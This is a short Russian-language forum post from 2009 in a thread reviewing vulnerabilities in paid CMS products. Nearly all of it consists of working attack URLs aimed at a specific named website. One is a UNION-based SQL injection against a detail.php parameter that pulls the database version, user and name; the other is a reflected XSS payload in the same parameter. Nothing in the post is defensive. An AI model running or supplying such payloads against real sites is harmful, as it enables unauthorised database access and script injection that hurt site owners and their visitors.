Тема: Обзор уязвимостей в платных CMS
Показать сообщение отдельно

  #52  
Старый 28.12.2009, 22:49
Twin $park
Новичок
Регистрация: 15.11.2009
Сообщений: 8
С нами: 8677322

Репутация: 79
По умолчанию
Laderett CMS

http://www.lederett.de/

SQL inj

паример:

Цитата:
http://www.lederett.de/_rubric/detail.php?nr=103+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5,6,7,8,9,10,11,12, 13+limit+1,1/*
XSS

Цитата:
http://www.lederett.de/_rubric/detail.php?nr=<script>alert(/xss/)</script>
(с) Twin $park
Последний раз редактировалось Twin $park; 02.01.2010 в 12:48..
 
Ответить с цитированием